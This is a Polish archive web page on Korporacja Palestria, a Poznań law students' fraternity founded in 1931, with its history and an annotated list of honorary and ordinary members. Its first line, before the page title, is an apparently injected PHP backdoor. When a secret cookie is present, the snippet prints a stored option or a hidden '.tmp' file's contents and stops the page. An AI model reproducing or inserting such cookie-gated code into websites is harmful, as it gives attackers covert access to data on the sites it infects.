if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Palestria

Dekiel Palestrii - vide Poszukiwania. Nazwa:
Korporacja Palestria
Siedziba:
Poznań
Data powstania:
7 XII 1931 r.
Barwy:
zielona – amarantowa – złota
Dewiza:
„Omnia pro Patria et iustitia” („Wszystko dla Ojczyzny i sprawiedliwości”)

Rys historyczny

Palestra została założona dnia 7 XII 1931 r. przez grupę 13 studentów Uniwersytetu Poznańskiego. Była korporacją wydziałową i skupiała wyłącznie słuchaczy Wydziału Prawno-Ekonomicznego. Powstała pod auspicjami konserwatywnej organizacji sanacyjnej Myśl Mocarstwowa. Inicjatorem powołania nowej korporacji był student prawa i były członek K! Magna-Polonia Stanisław Szymczewski.

Była korporacją sanacyjną. Należała do grupy korporacji, które w 1932 r. powołały ogólnopolski związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

W 1932 r. doszło w korporacji do rozłamu, którego powodem miał być sprzeciw części członków wobec zaangażowania Palestrii w działalność Myśli Mocarstwowej. W jego wyniku powstała konkurencyjna korporacja studentów prawa i ekonomii - Iustitia.

Dnia 20 III 1935 r. Senat Uniwersytetu zatwierdził statut Palestrii i zarejestrował nową korporację. Jej kuratorem z ramienia uczelni został prof. Czesław Znamierowski.

Korporacja działała do wybuchu II wojny światowej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 56 nazwisk, w tym czterech członków honorowych.

Brak wiadomości o powojennej działalności Palestrii i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Palestrii obejmuje ponad 50 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Leopold Hebda, lata 30-te.

 1. Leopold Hebda, (1877-1940), dr, bankowiec, wieloletni prezes Zarządu Banku Cukrownictwa w Poznaniu, Filister honorowy i II-gi Ojciec Mercurii, członek honorowy Palestrii

 2. Roger Adam hr. Raczyński, (8 grudnia 1889 w Warszawie - 10 listopada 1945 w Atenach) s. Edwarda i Róży z Potockich Krasińskiej, absolwent Gimnazjum im Jana III Sobieskiego w Krakowie, student rolnictwa w Lipsku i malarstwa w Monachium, ziemianin, polityk konserwatywny, dyplomata, od 1926 związany z obozem sanacyjnym, prezes BBWR w Poznaniu, prezes Związku Pracy Mocarstwowej, wojewoda poznański 1929-34, wiceminister rolnictwa 1934-36, ambasador RP w Rumunii 1938-40 oraz przy rządzie greckim 1942-45, Filister kooptowany (honorowy ?) Corony, Filister honorowy Panslavii oraz Palestrii
 3. Stanisław Runge, (3 maja 1888 - 1953) s. Ludwika i Natalii z Politalskich, student i absolwent 1913 Szkoły Weterynaryjnej we Lwowie, mjr rez., prof. i rektor 1933-36 UP, sanacyjny działacz polityczny, Filister honorowy lwowskiej Lutyko-Venedyi oraz poznańskiej Palestry, w czasie wojny w Wielkiej Brytanii, w 1946 wrócił do kraju, jeden z budynków Uniwersytetu Przyrodniczego na poznańskim Sołaczu nosi nazwę Kolegium Rungego, w 2003 na fasadzie kamienicy przy ul. Libelta 24, gdzie mieszkał, umieszczono tablicę pamiątkową ku jego czci
 4. Czesław Znamierowski, (?), (8 maja 1888 w Warszawie - 26 września 1967 w Poznaniu) studiował filozofię, historię, matematykę i fizykę na uniwersytetach w Lipsku, Petersburgu, Berlinie, Monachium i Bazylei, dr filozofii 1912, habilitacja UP 1924, prof. UP i UAM, kierownik Katedry Teorii Prawa, kurator i Filister honorowy Palestrii (?), od 1948 członek-korespondent PAU, dr honoris causa UAM 1965, autor wielu prac naukowych z zakresu teorii prawa oraz przekładów na język polski klasycznych dzieł z prawa, filozofii, etyki i socjologii

Członkowie rzeczywiści

 1. Stefan Bełżyński, prezes
 2. Kazimierz Bieniewski, adwokat
 3. Witold Büttner,
 4. Czyżewski,
 5. Andrzej Dąbrowski, założyciel Palestrii, wykładowca Wydziału Prawno-Ekonomicznego UP
 6. Władysław Dziak, radca
 7. Kazimierz Elznerowicz, prokurator w Sądzie Okręgowym
 8. C. Gauiski (?),
 9. Józef Gawroński , założyciel Palestrii
 10. Józef Gidyński, dr prawa, wykładowca Wydziału Prawno-Ekonomicznego UP [być może Józef Kazimierz Gidyński (1902 - ) po wojnie prof. Columbia University, prawnik, socjolog]
 11. Wł. Globisz (?),
 12. Władysław Górski, (22 stycznia 1917 w Szymanowicach - ), brat Józefa (Palestria), student i absolwent 1939 prawa UP, c. 1935 (?), akt. 1935-39, sekretarz sem. let. 1936/37, sekretarz sem. let. 1937/38, uczestnik wojny obronnej 1939, a następnie żołnierz PSZ na Zachodzie, w tym Brygady Strzelców Karpackich i II Korpusu, po wojnie wykładowca Akademii Handlowej w Szczecinie, w tym dziekan Wydziału Transportu oraz Uniwersytetu Szczecińskiego, w tym kierownik Katedry Prawa Transportowego Wydziału Transportu i Łączności, doktor honoris causa Uniwersytetu w Delaware i Uniwersytetu Szczecińskiego, autor ponad 400 prac naukowych, autor wspomnień “W mundurku i mundurze przez świat” (Szczecin 1998)
 13. Józef Górski, brat Władysława (Palestria), dr prawa, wykładowca Wydziału Prawno- Ekonomicznego UP, po wojnie rektor Akademii Handlowej w Poznaniu i Akademii Handlowej w Szczecinie
 14. Zygmunt Gronowski, skarbnik sem. let. 1935/36, prezes sem. let. 1936/37
 15. Bogdan Grzybowski, założyciel Palestrii
 16. Stanisław Hejmowski, (22 czerwca 1900 w Libawie w Kurlandii - 31 maja 1969 w Poznaniu) s. Konstantego i Blanki z Łuszczewskich, absolwent szkoły średniej w Sankt Petersburgu 1918, student i absolwent prawa UW 1924, adwokat, dr prawa UP 1931, po wojnie adwokat, bronił m.in. gauleitera Kraju Warty Artura Greisera, żołnierzy podziemia antykomunistycznego, robotników Czerwca ‘56
 17. Jeropkokwski, dr
 18. Wiktor Kalka, prezes 1935-37, w tym prezes sem. let. 1935/36
 19. Feliks Kaźmierczak, założyciel Palestrii

  Mieczysław Klauziński, lata 30-te.

 20. Mieczysław Klauziński, (15 grudnia 1914 w Dubinie k. Rawicza - 13 października 1980) s. Michała i Antoniny z d. Jasiewicz, uczeń Gimnazjum w Rawiczu, student prawa UP, żołnierz w wojnie obronnej 1939, więzień oflagu XIA na Pomorzu, po wojnie odbywał aplikację sądową w Poznaniu, adwokat, członek Rady Adwokackiej, bronił robotnika oskarżonego za udział w powstaniu poznańskim 1956

 21. Stefan Kotul, adwokat
 22. Wacław Kułczewski,
 23. Konrad Kwass, wiceprezes sem. let. 1936/37, prezes sem. let. 1937/38, prawnik, adwokat
 24. Lech Laskowski, założyciel Palestrii
 25. Łebiński, prawnik, adwokat
 26. Adam Łuszpiński, (1918 - 2004) sekretarz 1936, skarbnik sem. let. 1936/37, skarbnik sem. let. 1937/38, prawnik, po wojnie dyrektor Banku PKO
 27. Stanisław Marciniak, sekretarz sem. let. 1935/36, olderman sem. let. 1936/37
 28. Alfons Maron, olderman sem. let. 1937/38
 29. Zygmunt Nowosielski, dr prawa, adwokat
 30. Stanisław Owczarzak (?),
 31. Piotrowicz, założyciel Palestrii
 32. Hubert Pozorski, założyciel Palestrii
 33. Leon Rakowski (?),
 34. Stanisław Rakowski (?), dr
 35. Sasorski, dyrektor ZUPU
 36. Jan Sławski, (17 czerwca 1884 w Poznaniu - 15 kwietnia 1968 w Poznaniu) dr prawa, pracownik Wydziału Prawno-Ekonomicznego UP, adwokat
 37. Edward Stańczykiewicz, prezes 1932/33
 38. Staszonek,
 39. Kazimierz Straszewski, założyciel Palestrii, wiceprezes 1932/33
 40. Michał Strzęmski, założyciel Palestrii
 41. Janusz Szubert, sędzia Sądu Grodzkiego
 42. Stanisław Szymczewski, (23 marcu 1905 w Wieluniu - ) student prawa UP 1927- , członek Koła Prawników i Ekonomistów, c. 1929 Magna-Polonia, inicjator powstania i założyciel Palestrii, prezes 1932/33
 43. Stanisław Świderski, założyciel Palestrii
 44. Jan Terlecki,

  Zbigniew Tryburcy, ok. 1935 r.

 45. Zbigniew Tryburcy, ? (9 marca 1910 w Rabsztynie w pow. olkuskim - 10 stycznia 1970 w Warszawie) s. Henryka (zawiadowcy stacji Sosnowiec) i Marii z d. Zakrzewska, absolwent Państwowego Gimnazjum Męskiego im. Bolesława Prusa w Sosnowcu, student i absolwent prawa UP (mgr 1933), w czasie okupacji w ZWZ-AK ps. Rabsztyn, pracował w Dyrekcji Kolei Państwowych w Poznaniu i Bydgoszczy, Państwowej Centrali Handlowej, Państwowym Wydawnictwie Ekonomicznym, red. naczelny „Przeglądu Bibliograficznego Piśmiennictwa Ekonomicznego”, działał w Głównej Komisji Turystyki Polskiego Związku Motorowego, otrzymał odznakę Zasłużonego Działacza Turystyki oraz Medal Dziesięciolecia, pochowany na Cmentarzu Powązkowskim (kw. 79-6-29/30/31)

 46. Trzciński,

  Bolesław Tyc, 1928 r.

 47. Bolesław Tyc, (16 września 1908 w Radłowei w pow. ostrowskim w woj. poznańskim - 6 października 1999 w Łodzi) s. Franciszka i Marianny z d. Szkudlarz, absolwent Gimnazjum Klasycznego w Kępnie, twórca i prezes gimnazjalnego klubu Concordia, drużynowy Drużyny Harcerskiej im. Tadeusza Kościuszki, student i absolwent prawa UJ 1929-33, c. 1932 (?) Palestra, inicjator i założyciel Iustitii, pierwszy prezes sem. let. 1931/32, prezes Konwentu Filistrów 1937/38, po studiach referendarz w Starostwie Powiatowym we Włodzimierzu Wołyńskim, w czasie okupacji prowadził z bratem sklep w Lublinie, po 1945 adwokat w Poznaniu, Katowicach, Łodzi i Sochaczewie, w latach 40-tych działacz Stronnictwa Ludowego

 48. Józef Winiewicz,
 49. Ignacy Woźny,
 50. Jan Wójciak, wiceprezes sem. let. 1937/38
 51. Zenon Zaborowski, dyrektor Domu Rzemieślniczego
 52. Bolesław Zamysłowski, założyciel Palestrii
 53. Mieczysław Zbylut, założyciel Palestrii, sekretarz 1932

Listę członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum UAM,
2) Krzysztof Krasowski, Wydział Prawno-Ekonomiczny Uniwersytetu Poznańskiego w latach 1919-1939, Poznań 2006,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Palestria.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 7 X 2010 r.
Ostatnia zmiana: 5 III 2023 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Palestria (Poznań), (na:) www.archiwumkorporacyjne.pl, stan 5 III 2023 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }